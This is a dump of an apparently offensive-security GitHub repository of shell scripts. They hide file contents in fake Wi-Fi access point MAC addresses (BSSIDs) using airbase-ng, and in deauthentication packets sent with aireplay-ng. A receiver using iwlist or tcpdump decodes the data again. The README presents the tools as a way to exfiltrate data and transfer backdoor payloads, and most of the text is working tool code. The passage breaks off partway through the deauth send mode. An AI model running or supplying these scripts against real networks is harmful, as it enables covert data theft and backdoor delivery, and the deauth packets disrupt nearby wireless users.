Description: with Step1 (system A) you will inject bytes for (mytext.txt) file to BSSID for Fake AP in this case (myfakeAP) , with Step2 on (system B) you can have this text file via Scanning Fake AP on AIR by Wireless traffic (Using iwlist tool)

Note : before step1 you should make MonitorMode Interface (WlanXmon) by this command for example : airmon-ng start wlan3


![](https://github.com/DamonMohammadbagher/NativePayload_BSSID/blob/master/Chapter%209%20-%20Transferring%20Backdoor%20Payload%20by%20Wireless%20Traffic%20-BSSID/NativePayload_BSSID1.png)

![](https://github.com/DamonMohammadbagher/NativePayload_BSSID/blob/master/Chapter%209%20-%20Transferring%20Backdoor%20Payload%20by%20Wireless%20Traffic%20-BSSID/NativePayload_BSSID2.png)

--------------------------------------------------------------------------------
/EBOOK/Client_Exfiltration_via_FakeAP.sh:
--------------------------------------------------------------------------------
#!/bin/sh
# Generator, not a sender: prints a second shell script to stdout, one airbase-ng command per
# 5-byte chunk of the input file.  Nothing is transmitted by this script itself.
# Arguments: $1 input file, $2 fake-AP ESSID, $3 interface passed to airbase-ng
#            (a monitor-mode interface per the README above).
# Each chunk is hex-encoded and placed in the generated fake AP's BSSID as 00:xx:xx:xx:xx:xx;
# the last chunk may be shorter than 5 bytes.
# NOTE(review): $1/$2/$3 are unquoted everywhere, so this only works for plain names.
echo " #!/bin/sh"
# 5 bytes per word as hex, then "aa:bb:cc:dd:ee:" (trailing colon added by sed)
for bytes in `xxd -p -c 5 $1 | sed 's/../&:/g'`;
do
  # replace the trailing ':' with a space
  Exfil=`echo $bytes | sed 's/:$/ /'`
  # human-readable copy of the chunk for the generated comment line
  text=`echo $Exfil | xxd -r -p`
  echo "#Injecting text: " \"$text\" "to Mac via BSSID" 00:$Exfil "for FAKE AccessPoint: " $2
  echo "airbase-ng -a " 00:$Exfil " --essid" $2 "-I 10 -0 " $3 " ;"
  echo
done

--------------------------------------------------------------------------------
/EBOOK/Client_killAP.sh:
--------------------------------------------------------------------------------
#!/bin/bash
# Kills airbase-ng every 10 seconds, $1 times -- presumably to give each generated airbase-ng
# command (see Client_Exfiltration_via_FakeAP.sh) about 10 s on air before the next one.
# Argument: $1 number of rounds.  ((c++)) is bash-only, hence the bash shebang.
c=1
while [ $c -le $1 ]
do
  sleep 10 ;
  killall airbase-ng ;
  echo $c "Killing airbase-ng Process Done";
  ((c++))
done


--------------------------------------------------------------------------------
/EBOOK/GetData.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/DamonMohammadbagher/NativePayload_BSSID/d83b2b75b1086a6cea16aa040cd9d3dae4d21e78/EBOOK/GetData.png
--------------------------------------------------------------------------------
/EBOOK/README.md:
--------------------------------------------------------------------------------
# Simple Linux Scripts for Transferring/Exfiltration DATA via BSSID and Wireless Traffic

For More Information and Use These Scripts Step by Step Please Read This Article :

Article : https://www.peerlyst.com/posts/linux-systems-and-data-transferring-exfiltration-via-bssid-by-wireless-traffic-damon-mohammadbagher

Related Article : https://www.peerlyst.com/posts/transferring-backdoor-payloads-with-bssid-by-wireless-traffic-damon-mohammadbagher


--------------------------------------------------------------------------------
/EBOOK/Server_GetData_via_BSSID.sh:
--------------------------------------------------------------------------------
#!/bin/sh
# Decodes data carried in BSSIDs from a saved scan dump.
# Argument: $1 scan dump (presumably the file written by Server_iwlist_Scan.sh, i.e. the
#           "Address: 00:" lines of iwlist scan collapsed onto one line).
# Writes AP_Info_list.txt (the dump re-split into 37-character records) and BSSID_List.txt
# (field 5 of each record, presumably the MAC address -- confirm against the iwlist line
# format) to the working directory.  $1 is unquoted: plain names only.
fold -w37 $1 > AP_Info_list.txt;
awk {'print $5'} AP_Info_list.txt > BSSID_List.txt;

# Debug listing: awk '!a[$0]++' keeps the first occurrence of each address, in order; xxd -p
# turns that text into hex lines, and each whitespace-separated word of it is decoded once
# (ops1, the address text) and twice (ops2, the bytes that address encodes).
for ops in `awk '!a[$0]++' BSSID_List.txt | xxd -p`;
do
  ops1=`echo $ops | xxd -r -p`
  ops2=`echo $ops | xxd -r -p | xxd -r -p`
  echo $ops1 "==>" $ops2
done
echo
echo "[;)] your Injected Bytes via Mac Addresses: "
echo `awk '!a[$0]++' BSSID_List.txt`
echo
echo "[;o] your Data : "
echo
# Final decode of the de-duplicated address list.  No finish-flag address is filtered out here
# (compare receiveBssids in NativePayload_BSSID.sh v2).
echo `awk '!a[$0]++' BSSID_List.txt | xxd -r -p`

--------------------------------------------------------------------------------
/EBOOK/Server_iwlist_Scan.sh:
-------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | x=1 3 | while [ $x -le $1 ] 4 | do 5 | echo $x 6 | ((x++)) 7 | echo `iwlist 'wlan0' 'scan' | grep -e "Address: 00:"` >> $2 ; 8 | echo "iwlist AP List Dumped to file" $2; 9 | sleep 6 ; 10 | done 11 | fold -w37 $2 > output.txt ; 12 | echo "AP List saved in Output.txt file" 13 | echo 14 | cat output.txt 15 | # echo `awk '!a[$0]++' output.txt` 16 | 17 | -------------------------------------------------------------------------------- /NativePayload_BSSID v2/NativePayload_BSSID.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | echo 3 | echo "NativePayload_BSSID.sh v2 , Published by Damon Mohammadbagher 2017-2019" 4 | echo "Injecting/Downloading/Uploading DATA via BSSID (Wireless Traffic)" 5 | echo "help syntax: ./NativePayload_BSSID.sh help" 6 | echo 7 | 8 | function _help () 9 | { 10 | tput setaf 2 11 | echo 12 | echo "[@]:NativePayload_BSSID.sh $(tput setaf 11)v2$(tput setaf 2) , Published by $(tput setaf 3)Damon Mohammadbagher 2017-2019$(tput setaf 2)" 13 | echo "[@]:NativePayload_BSSID.sh (Internal.Commands):" 14 | echo 15 | tput setaf 10 16 | echo "[@]:Client/Server Side (Internal.Commands):" 17 | echo 18 | tput setaf 2 19 | printf '\u2507'; echo "$(tput setaf 11) @help $(tput setaf 2) => show all internal Commands" 20 | printf '\u2523\u2509'; echo "Description: Help for commands" 21 | printf '\u2516\u2509'; echo "Example:#@help" 22 | echo 23 | printf '\u2507'; echo "$(tput setaf 11) @exit $(tput setaf 2) => exit" 24 | printf '\u2523\u2509'; echo "Description: exit to Console" 25 | printf '\u2516\u2509'; echo "Example:#@exit" 26 | echo 27 | printf '\u2507'; echo "$(tput setaf 11) @clientmode $(tput setaf 2) or $(tput setaf 11) @cli $(tput setaf 2) => switch to client mode" 28 | printf '\u2523\u2509'; echo "Description: switch to client mode" 29 | printf '\u2523\u2509'; echo "Example:#@clientmode" 30 | printf 
'\u2516\u2509'; echo "Example:#@cli" 31 | echo 32 | printf '\u2507'; echo "$(tput setaf 11) @servermode $(tput setaf 2) or $(tput setaf 11) @serv $(tput setaf 2) => switch to server mode" 33 | printf '\u2523\u2509'; echo "Description: switch to server mode" 34 | printf '\u2523\u2509'; echo "Example:#@servermode" 35 | printf '\u2516\u2509'; echo "Example:#@serv" 36 | echo 37 | printf '\u2507'; echo "$(tput setaf 11) @clear $(tput setaf 2) => Console clear" 38 | printf '\u2523\u2509'; echo "Description: Console clear" 39 | printf '\u2516\u2509'; echo "Example:#@clear" 40 | echo 41 | printf '\u2507'; echo "$(tput setaf 11) @dbgon $(tput setaf 2) => show details : enable" 42 | printf '\u2523\u2509'; echo "Description: show all details" 43 | printf '\u2516\u2509'; echo "Example:#@dbgon" 44 | echo 45 | printf '\u2507'; echo "$(tput setaf 11) @dbgoff $(tput setaf 2) => show details : disable" 46 | printf '\u2523\u2509'; echo "Description: Disabling details (default)" 47 | printf '\u2516\u2509'; echo "Example:#@dbgoff" 48 | echo 49 | tput setaf 10 50 | echo "[@]:Server Side (only) (Internal.Commands):" 51 | echo 52 | tput setaf 2 53 | printf '\u2507'; echo "$(tput setaf 11) @bssid $(tput setaf 2) or $(tput setaf 11) bssid $(tput setaf 2) => Scanning BSSID via Iwlist (server-side) $(tput setaf 3)(Old v1 / slow)$(tput setaf 2)" 54 | printf '\u2523\u2509'; echo "Description: Scanning BSSID on AIR via Iwlist tool to dump Exfil/Text/Data from (client-side) (default)" 55 | printf '\u2523\u2509'; echo "Example:#@bssid" 56 | printf '\u2516\u2509'; echo "Example:#bssid" 57 | echo 58 | printf '\u2507'; echo "$(tput setaf 11) @deauth $(tput setaf 2) or $(tput setaf 11) deauth $(tput setaf 2) => Attack.(Deauth) Packet Monitoring for Fake AP (server-side) $(tput setaf 3)(New v2 / very fast)$(tput setaf 2)" 59 | printf '\u2523\u2509'; echo "Description: Monitoring WlanMon interface (Monitor-Interface) to Detect Recevied Payload via Deauth Attack Packets from Clients" 60 | printf 
'\u2523\u2509'; echo "Example:#@deauth" 61 | printf '\u2516\u2509'; echo "Example:#deauth" 62 | echo 63 | printf '\u2507'; echo "$(tput setaf 11) @run $(tput setaf 2) => running server side Methods [BSSID or DeAuth]" 64 | printf '\u2523\u2509'; echo "Description: running server side Methods [BSSID or DeAuth]" 65 | printf '\u2516\u2509'; echo "Example:#@run" 66 | 67 | } 68 | function killairbase 69 | { 70 | 71 | sleep 10 ; 72 | echo 73 | killall airbase-ng ; 74 | 75 | } 76 | 77 | ################################################## version 1 ################################################## 78 | ################################################## send_Bssids v1 ################################################# 79 | # ./NativePayload_BSSID.sh -f mytext.txt Fake wlan1mon0 80 | # making fake mode (send_Bssids) 81 | if [ $1 == "-f" ] 82 | then 83 | for bytes in `xxd -p -c 5 $2 | sed 's/../&:/g'`; 84 | do 85 | tput setaf 6; 86 | Exfil="${bytes::-1}" 87 | text=`echo $Exfil | xxd -r -p` 88 | Time=`date '+%d/%m/%Y %H:%M:%S'` 89 | echo "[!]:[$Time] Injecting text: "\"$text\" "to Mac via BSSID" "[00:$Exfil]" "for FAKE AccessPoint: " $3 90 | sleep 0.3 91 | tput setaf 9; 92 | # Making Fake AP via airbase and Injecting Payloads to BSSIDs (MAC Address) 93 | killairbase | airbase-ng -a 00:$Exfil --essid $3 -I 10 -0 $4 | grep started 94 | 95 | done 96 | Time=`date '+%d/%m/%Y %H:%M:%S'` 97 | tput setaf 6; 98 | echo "[>]:[$Time] Setting Finish Flag [00:ff:00:ff:00:ff] to BSSID..." 
# tail of the v1 "-f" (send) block: the last fake AP carries the constant finish-flag address
  sleep 0.3
  tput setaf 9;
  killairbase | airbase-ng -a 00:ff:00:ff:00:ff --essid $3 -I 10 -0 $4 | grep started
fi
################################################## send_Bssids v1 #####################################
################################################## receive_Bssids v1 #####################################
# ./NativePayload_BSSID.sh -s wlan0 myExfildump.txt
# starting scan mode (dump_Bssids)
#
# v1 receive side.  Arguments: $2 wifi interface for iwlist, $3 dump file (see the help text).
# Appends every "Address: 00:" line of an iwlist scan to $3 every 4.2 s until the finish-flag
# address 00:ff:00:ff:00:ff / 00:FF:00:FF:00:FF is present, then takes field 5 of each 37-column
# record (presumably the BSSID -- confirm against the iwlist line format), keeps the first
# occurrence of each, drops the last 17 characters (the length of the finish-flag address) and
# hex-decodes the rest.  Files written to the working directory: $3, temp.txt, temp2Awk.txt,
# ExfilOutput_<timestamp>.txt.  $2/$3 are unquoted throughout: plain names only.
if [ $1 == "-s" ]
then
  echo "Scanning Mode by \"Iwlist\" tool Started."
  echo "" > $3
  while true
  do
    # echo `iwlist 'wlan0' 'scan' | grep -e "Address: 00:"` >> $2 ;
    # one scan per pass; the echo collapses the matching lines onto one line before appending
    echo `iwlist $2 'scan' | grep -e "Address: 00:"` >> $3 ;
    tput setaf 9;
    Time=`date '+%d/%m/%Y %H:%M:%S'`
    echo "[!]:[$Time] iwlist AP list Dumped to file: " $3;
    sleep 4.2 ;
    FinishFlag=`cat $3 | grep -e 00:ff:00:ff:00:ff -e 00:FF:00:FF:00:FF`
    # non-empty grep result == finish flag seen
    if (( `echo ${#FinishFlag}` !=0 ))
    then
      Time=`date '+%d/%m/%Y %H:%M:%S'`
      sleep 0.3
      tput setaf 7;
      echo "[!]:[$Time] Finish flag BSSID Address Detected :" 00:ff:00:ff:00:ff
      break
    fi
  done
  tput setaf 9;
  # fold -w37 $3 > output.txt ;
  Time=`date '+%d/%m/%Y %H:%M:%S'`
  echo "[>] [$Time] AP List saved to" \"temp.txt\" "file"
  echo

  # DEBUG
  # cat output.txt
  # re-split the single-line dump into 37-character records, then keep field 5 of each
  fold -w37 $3 > temp.txt;
  awk {'print $5'} temp.txt > temp2Awk.txt;
  # using '!a[$0]++' is not good idea ;) sometimes.... .
  # (author's note above: first-occurrence de-duplication presumably also drops a chunk that legitimately repeats)
  # debug listing: each whitespace-separated word of the hex dump decoded once (the address text)
  # and twice (the bytes it encodes)
  for ops in `awk '!a[$0]++' temp2Awk.txt | xxd -p`;
  do
    ops1=`echo $ops | xxd -r -p`
    ops2=`echo $ops | xxd -r -p | xxd -r -p`
    echo $ops1 "==>" $ops2
  done
  echo
  echo "[!] your Injected Bytes via BSSID Addresses: "
  echo
  echo `awk '!a[$0]++' temp2Awk.txt`
  echo
  echo "[!] your Text/Data: "
  echo
  ExfilString=`cat temp2Awk.txt | awk '!a[$0]++'`
  # ${ExfilString::-17} drops the trailing finish-flag address (17 characters); assumes it is the last entry
  echo "${ExfilString::-17}" | xxd -r -p
  Timestr=`date '+%d-%m-%Y.%H-%M-%S'`
  echo " " > ExfilOutput_$Timestr.txt
  echo
  echo "[>] your Text/Data saved to" \"ExfilOutput_$Timestr.txt\" "file"
  str=`echo "${ExfilString::-17}" | xxd -r -p`
  # unquoted: the saved copy is word-split and glob-expanded
  echo $str > ExfilOutput_$Timestr.txt
fi
################################################## receive_Bssids v1 #####################################
################################################## version 1 ##################################################

###################################################################################################################
###################################################################################################################
###################################################################################################################

################################################## version 2 ##################################################
################################################## send_Bssids v2 ###############################
# sendBssids "text" "fake-AP ESSID" "monitor-mode interface" "true|false"
#
# v2 send side (called from the -exfilserver chat loop).  Arguments: $1 the text to send (a
# string, not a file name: it is fed to xxd through echo, so the data ends with echo's newline),
# $2 fake-AP ESSID, $3 interface for airbase-ng (the -exfilserver prompt asks for a monitor-mode
# interface), $4 "true" prints every chunk, anything else prints one progress dot per chunk.
# Every 5-byte chunk of $1 is hex-encoded and placed in a fake-AP BSSID of the form
# 00:xx:xx:xx:xx:xx; a short final chunk is padded with ":20" and cut to 17 characters.
# One airbase-ng per chunk, each started 10 s after the previous one; killairbase (sleep 10;
# killall airbase-ng) runs in the same background pipeline, so every fake AP is killed roughly
# 10 s after it starts.  The constant address 00:ff:00:ff:00:ff is sent last as the finish flag.
# Writes airbase_output.txt in the working directory.  $2/$3/$tempaddress are unquoted: plain names only.
function sendBssids
{
  tput setaf 6;
  Time=`date '+%d/%m/%Y %H:%M:%S'`
  echo "[>]:[$Time] Exfiltration.via.BSSID:Started"

  # 5 bytes per word as hex, then "aa:bb:cc:dd:ee:" (trailing colon added by sed)
  for bytes in `echo "$1" | xxd -p -c 5 | sed 's/../&:/g'`;
  do

    # drop the trailing ':'
    Exfil="${bytes::-1}"
    text=`echo $Exfil | xxd -r -p`
    Time=`date '+%d/%m/%Y %H:%M:%S'`
    if [ "$4" == "true" ]
    then
      tput setaf 10;
      echo "[!]:[$Time] Injecting text: "\"$text\" "to Mac via BSSID" "[00:$Exfil]" "for FAKE AccessPoint: " $2
    else
      tput setaf 6;
      printf "."
    fi
    sleep 10
    tput setaf 9;
    # pad with ":20" octets and keep the first 17 characters so a short last chunk still forms a full address
    tempaddress=`echo "00:$Exfil:20:20:20:20:20:20" | head -c17`
    # fake AP with the chunk as its BSSID; killairbase in the same pipeline ends it after ~10 s
    killairbase | nohup airbase-ng -a $tempaddress --essid $2 -I 10 -0 $3 > "airbase_output.txt" 2>&1 &
  done

  if [ "$4" == "false" ]
  then
    echo " "
  fi
  tput setaf 10;
  Time=`date '+%d/%m/%Y %H:%M:%S'`
  echo "[>]:[$Time] Setting Finish Flag [00:ff:00:ff:00:ff] to BSSID..."
  sleep 10

  killairbase | nohup airbase-ng -a 00:ff:00:ff:00:ff --essid $2 -I 10 -0 $3 > "airbase_output.txt" 2>&1 &
  Time=`date '+%d/%m/%Y %H:%M:%S'`
  tput setaf 6;
  echo "[>]:[$Time] Exfiltration.via.BSSID:Done"
  tput setaf 2;
}
################################################## send_Bssids v2 ###############################

################################################## receive_Bssids v2 ############################
# v2 receive side (called from the -exfilserver chat loop).  Arguments: $1 wifi interface for
# iwlist, $2 dump file, $3 "true" logs every scan, "false" prints one progress dot per scan.
# Appends every "Address: 00:" line of an iwlist scan to $2 every 4.2 s until the finish-flag
# address is present, then re-splits the dump into 37-column records, keeps field 5 of each
# (presumably the BSSID -- confirm against the iwlist line format) minus the finish flag and the
# "00:" prefixes, de-duplicates by first occurrence and hex-decodes.  Files written to the
# working directory: $2, temp.txt, temp2Awk.txt, ExfilOutput_<timestamp>.txt.
# NOTE(review): ExfilString is already the xxd -r -p output, and str (just before the save) runs
# xxd -r -p on it a second time, so the saved file may not match what is printed -- confirm.
function receiveBssids
{
  # ./NativePayload_BSSID.sh -s wlan0 myExfildump.txt
  # receiveBssids "wlan0" "myExfildump.txt" "false"
  #echo "Scanning Mode by \"Iwlist\" tool Started."
  Time=`date '+%d/%m/%Y %H:%M:%S'`
  tput setaf 6;
  echo "[>]:[$Time]:Iwlist.AP.Scanning.via.[$1]:Started"
  echo "" > $2
  while true
  do
    # echo `iwlist 'wlan0' 'scan' | grep -e "Address: 00:"` >> $2 ;
    # one scan per pass; the echo collapses the matching lines onto one line before appending
    echo `iwlist $1 'scan' | grep -e "Address: 00:"` >> $2 ;
    if [ "$3" == "true" ]
    then
      tput setaf 10;
      Time=`date '+%d/%m/%Y %H:%M:%S'`
      echo "[!]:[$Time]:Iwlist.APlist.Saving.[$2]:Done";
    else
      printf "."
235 | fi 236 | 237 | sleep 4.2 ; 238 | 239 | FinishFlag=`strings "$2" | grep -e 00:ff:00:ff:00:ff -e 00:FF:00:FF:00:FF` 240 | if (( `echo ${#FinishFlag}` !=0 )) 241 | then 242 | if [ "$3" == "false" ] 243 | then 244 | echo 245 | fi 246 | sleep 0.3 247 | tput setaf 6; 248 | Time=`date '+%d/%m/%Y %H:%M:%S'` 249 | echo "[!]:[$Time]:Finish.flag.BSSID.[00:ff:00:ff:00:ff]:Detected" 250 | break 251 | fi 252 | done 253 | 254 | tput setaf 6; 255 | Time=`date '+%d/%m/%Y %H:%M:%S'` 256 | echo "[>]:[$Time]:Iwlist.APlist.Saving.[temp.txt]:Done"; 257 | 258 | # DEBUG 259 | # cat output.txt 260 | tput setaf 10; 261 | fold -w37 $2 > temp.txt; 262 | awk {'print $5'} temp.txt | sed 's/00:ff:00:ff:00:ff//g' | sed 's/00:FF:00:FF:00:FF//g' | sed 's/00://g' > temp2Awk.txt; 263 | 264 | tput setaf 2; 265 | Time=`date '+%d/%m/%Y %H:%M:%S'` 266 | printf "[!]:[$Time]:Injected.Bytes.[BSSID]:" 267 | echo `awk '!a[$0]++' temp2Awk.txt` 268 | ExfilString=`strings temp2Awk.txt | sed 's/00:ff:00:ff:00:ff//g' | sed 's/00:FF:00:FF:00:FF//g'| awk '!a[$0]++' | xxd -r -p` 269 | tput setaf 10; 270 | echo "[!]:[$Time]:Dumped.[Text/Data]:$(tput setaf 11) $ExfilString" 271 | Timestr=`date '+%d-%m-%Y.%H-%M-%S'` 272 | echo " " > "ExfilOutput_$Timestr.txt" 273 | str=`echo "$ExfilString" | xxd -r -p` 274 | echo $str > ExfilOutput_$Timestr.txt 275 | Time=`date '+%d/%m/%Y %H:%M:%S'` 276 | tput setaf 10; 277 | echo "[>]:[$Time]:Text.saved.[ExfilOutput_$Timestr.txt]:Done" 278 | tput setaf 2; 279 | } 280 | ################################################## receive_Bssids v2 ############################ 281 | 282 | ########################################### ExfilDeauth v2 (send) ############################### 283 | # ExfilDeauth "up.txt" "00:11:22:33:44:55" "wlan0" "1" 284 | # ExfilDeauth "local text file" "target AP/Fake AP BSSID" "local Wlan" "local wlan channel" 285 | function ExfilDeauth 286 | { 287 | Time=`date '+%d/%m/%Y %H:%M:%S'` 288 | tput setaf 6; 289 | echo "[>]:[$Time]:Exfiltration via Deauthentication 
Packets:Started" 290 | tput setaf 2; 291 | echo "[>]:[$Time]:Sending Deauthentication Packets via $3 by channel $4 to Default Target AP:Started" 292 | echo "[>]:[$Time]:Sending Deauthentication Packets to Target AP.BSSID.[00:11:22:33:44:55]:Started" 293 | 294 | `iwconfig $3 channel $4` 295 | Random1=`head /dev/urandom | tr -dc 0-2 | head -c1` 296 | id="0" 297 | 298 | for bytes in `echo "$1" | xxd -p -c 5 | sed 's/../&:/g'`; 299 | do 300 | tput setaf 2; 301 | Exfil="${bytes::-1}" 302 | text=`echo "$Exfil:20:20:20:20:20:20" | head -c17 | xxd -r -p` 303 | Time=`date '+%d/%m/%Y %H:%M:%S'` 304 | 305 | if [ "$id" == "0" ] ; 306 | then 307 | Random1="0" 308 | id="1" 309 | elif [ "$id" == "1" ] ; 310 | then 311 | Random1="1" 312 | id="2" 313 | elif [ "$id" == "2" ] ; 314 | then 315 | Random1="2" 316 | id="3" 317 | elif [ "$id" == "3" ] ; 318 | then 319 | Random1="3" 320 | id="4" 321 | elif [ "$id" == "4" ] ; 322 | then 323 | Random1="4" 324 | id="5" 325 | elif [ "$id" == "5" ] ; 326 | then 327 | Random1="5" 328 | id="6" 329 | elif [ "$id" == "6" ] ; 330 | then 331 | Random1="6" 332 | id="7" 333 | elif [ "$id" == "7" ] ; 334 | then 335 | Random1="7" 336 | id="8" 337 | elif [ "$id" == "8" ] ; 338 | then 339 | Random1="8" 340 | id="9" 341 | elif [ "$id" == "9" ] ; 342 | then 343 | Random1="9" 344 | id="a" 345 | elif [ "$id" == "a" ] ; 346 | then 347 | Random1="a" 348 | id="b" 349 | elif [ "$id" == "b" ] ; 350 | then 351 | Random1="b" 352 | id="c" 353 | elif [ "$id" == "c" ] ; 354 | then 355 | Random1="c" 356 | id="d" 357 | elif [ "$id" == "d" ] ; 358 | then 359 | Random1="d" 360 | id="e" 361 | elif [ "$id" == "e" ] ; 362 | then 363 | Random1="e" 364 | id="f" 365 | elif [ "$id" == "f" ] ; 366 | then 367 | Random1="f" 368 | id="0" 369 | fi 370 | 371 | tempaddress=`echo "0$Random1:$Exfil:20:20:20:20:20:20" | head -c17` 372 | sleep 0.2 373 | 374 | if [ "$5" == "true" ] 375 | then 376 | tput setaf 10; 377 | Time=`date '+%d/%m/%Y %H:%M:%S'` 378 | echo "[!]:[$Time]:Injecting text: 
"\"$text\" "to Deauthentication Packet via" "[$tempaddress]" "for FAKE AccessPoint: " $2 379 | aireplay-ng -0 1 -a "$2" -c "$tempaddress" "$3" | grep "Sending" & 380 | else 381 | printf "." 382 | tput setaf 10; 383 | aireplay-ng -0 1 -a "$2" -c "$tempaddress" "$3" | grep "error ;)" & 384 | fi 385 | 386 | done 387 | 388 | if [ "$5" == "false" ] 389 | then 390 | echo " " 391 | fi 392 | sleep 0.1 393 | Time=`date '+%d/%m/%Y %H:%M:%S'` 394 | echo "[>]:[$Time]:Sending Finish Flag [00:ff:00:ff:00:ff] to target AccessPoint: $2" 395 | aireplay-ng -0 3 -a "$2" -c "00:ff:00:ff:00:ff" "$3" | grep "error ;)" & 396 | wait; 397 | Time=`date '+%d/%m/%Y %H:%M:%S'` 398 | tput setaf 6; 399 | echo "[!]:[$Time]:Exfiltration via Deauthentication Packets:Done" 400 | 401 | } 402 | ########################################### ExfilDeauth v2 (send) ############################### 403 | 404 | 405 | ########################################### ExfilDeauth v2 (receive) ############################ 406 | # ExfilDeauthDumps -dumpdeauth wlan1mon "1" 407 | # ExfilDeauthDumps "essid-fakev2" wlan1mon channel true 408 | function ExfilDeauthDumps 409 | { 410 | 411 | tput setaf 2; 412 | FakeAp="$1" 413 | 414 | if [ "$1" == "" ] 415 | then 416 | FakeAp="fakev2"; 417 | fi 418 | 419 | Time=`date '+%d/%m/%Y %H:%M:%S'` 420 | echo "[>]:[$Time]:Default AP.BSSID.[00:11:22:33:44:55]:Created" 421 | nohup airbase-ng -a 00:11:22:33:44:55 --essid "$FakeAp" -I 10 -0 "$2" -c "$3" > "airbase_output.txt" 2>&1 & 422 | Time=`date '+%d/%m/%Y %H:%M:%S'` 423 | tput setaf 10; 424 | echo "[>]:[$Time]:Default AP.ESSID.[$FakeAp] with Wifi Channel.[$3] via $2:Started" 425 | tput setaf 2; 426 | sleep 1.5 427 | `nohup tcpdump -i "$2" -n | grep "DeAuthentication" > "DeauthPayloadDumps.txt" 2>&1 &` 428 | sleep 1 429 | Time=`date '+%d/%m/%Y %H:%M:%S'` 430 | echo "[>]:[$Time]:$2 Packet Monitoring for DeAuthentication Traffic:Started" 431 | while true 432 | do 433 | if [ "$4" == "true" ] 434 | then 435 | printf '.' 
436 | fi 437 | FinishFlag=`strings "DeauthPayloadDumps.txt" | grep "00:ff:00:ff:00:ff"` 438 | if (( `echo ${#FinishFlag}` !=0 )) 439 | then 440 | tput setaf 6; 441 | Time=`date '+%d/%m/%Y %H:%M:%S'` 442 | if [ "$4" == "true" ] 443 | then 444 | echo "" 445 | fi 446 | echo "[!]:[$Time]:Finish Flag:Detected" 447 | break; 448 | fi 449 | sleep 3.5 450 | done 451 | `strings "DeauthPayloadDumps.txt" | awk {'print $12'} | awk '!a[$0]++' | sed "s/00:11:22:33:44:55//g" | sed 's/00:ff:00:ff:00:ff//g' | sed 's/00:FF:00:FF:00:FF//g' | sed 's/00:11:22:33:44:55//g' | sed 's/00://g' | sed 's/01://g' | sed 's/02://g' | sed 's/03://g' | sed 's/04://g' | sed 's/05://g' | sed 's/06://g' | sed 's/07://g' | sed 's/08://g' | sed 's/09://g' | sed 's/0a://g' | sed 's/0b://g' | sed 's/0c://g' | sed 's/0d://g' | sed 's/0e://g' | sed 's/0f://g' | xxd -r -p > "DeAuthbytes.txt" ` 452 | payload=`cat DeAuthbytes.txt` 453 | Time=`date '+%d/%m/%Y %H:%M:%S'` 454 | tput setaf 6; 455 | echo "[!]:[$Time]:Payload Dumping:Done" 456 | tput setaf 10; 457 | echo "[!]:[$Time]:Text/Data Dumped:$(tput setaf 11) $payload" 458 | nohup killall airbase-ng > "kill.txt" 2>&1 & 459 | nohup killall tcpdump > "kill.txt" 2>&1 & 460 | tput setaf 10; 461 | Timestr=`date '+%d-%m-%Y.%H-%M-%S'` 462 | echo " " > "ExfilOutput_$Timestr.txt" 463 | echo $payload > "ExfilOutput_$Timestr.txt" 464 | echo "[>]:[$Time]:Text/Data saved to \"ExfilOutput_$Timestr.txt\"" 465 | tput setaf 2; 466 | } 467 | ########################################### ExfilDeauth v2 (receive) ############################ 468 | 469 | ############################### ExfilDeauth v2 (Command-based send) ############################### 470 | # ./NativePayload_BSSID.sh -exfildeauth text.txt "bssid" wlan1 "7" 471 | # ./NativePayload_BSSID.sh -exfildeauth text.txt "00:11:22:33:44:55" wlan1 "7" "dbg" 472 | if [ $1 == "-exfildeauth" ]; 473 | then 474 | `iwconfig $4 channel $5` 475 | Random1=`head /dev/urandom | tr -dc 0-2 | head -c1` 476 | id="0" 477 | 478 | for bytes 
in `strings $2 | xxd -p -c 5 | sed 's/../&:/g'`; 479 | do 480 | tput setaf 2; 481 | Exfil="${bytes::-1}" 482 | text=`echo $Exfil | xxd -r -p` 483 | 484 | tput setaf 10; 485 | 486 | if [ "$id" == "0" ] ; 487 | then 488 | Random1="0" 489 | id="1" 490 | elif [ "$id" == "1" ] ; 491 | then 492 | Random1="1" 493 | id="2" 494 | elif [ "$id" == "2" ] ; 495 | then 496 | Random1="2" 497 | id="3" 498 | elif [ "$id" == "3" ] ; 499 | then 500 | Random1="3" 501 | id="4" 502 | elif [ "$id" == "4" ] ; 503 | then 504 | Random1="4" 505 | id="5" 506 | elif [ "$id" == "5" ] ; 507 | then 508 | Random1="5" 509 | id="6" 510 | elif [ "$id" == "6" ] ; 511 | then 512 | Random1="6" 513 | id="7" 514 | elif [ "$id" == "7" ] ; 515 | then 516 | Random1="7" 517 | id="8" 518 | elif [ "$id" == "8" ] ; 519 | then 520 | Random1="8" 521 | id="9" 522 | elif [ "$id" == "9" ] ; 523 | then 524 | Random1="9" 525 | id="a" 526 | elif [ "$id" == "a" ] ; 527 | then 528 | Random1="a" 529 | id="b" 530 | elif [ "$id" == "b" ] ; 531 | then 532 | Random1="b" 533 | id="c" 534 | elif [ "$id" == "c" ] ; 535 | then 536 | Random1="c" 537 | id="d" 538 | elif [ "$id" == "d" ] ; 539 | then 540 | Random1="d" 541 | id="e" 542 | elif [ "$id" == "e" ] ; 543 | then 544 | Random1="e" 545 | id="f" 546 | elif [ "$id" == "f" ] ; 547 | then 548 | Random1="f" 549 | id="0" 550 | fi 551 | #sleep 0.1 552 | tempaddress=`echo "0$Random1:$Exfil:20:20:20:20:20:20" | head -c17` 553 | sleep 0.2 554 | if [ "$6" == "fast" ] ; 555 | then 556 | echo "$(tput setaf 2)[!]:Sending [$(tput setaf 11)"$text"$(tput setaf 2)] via DeAuth.Cli.BSSID.[$(tput setaf 3)$tempaddress$(tput setaf 2)]" "to Target AP.[$(tput setaf 3)"$3"$(tput setaf 2)]$(tput setaf 10) Done." 
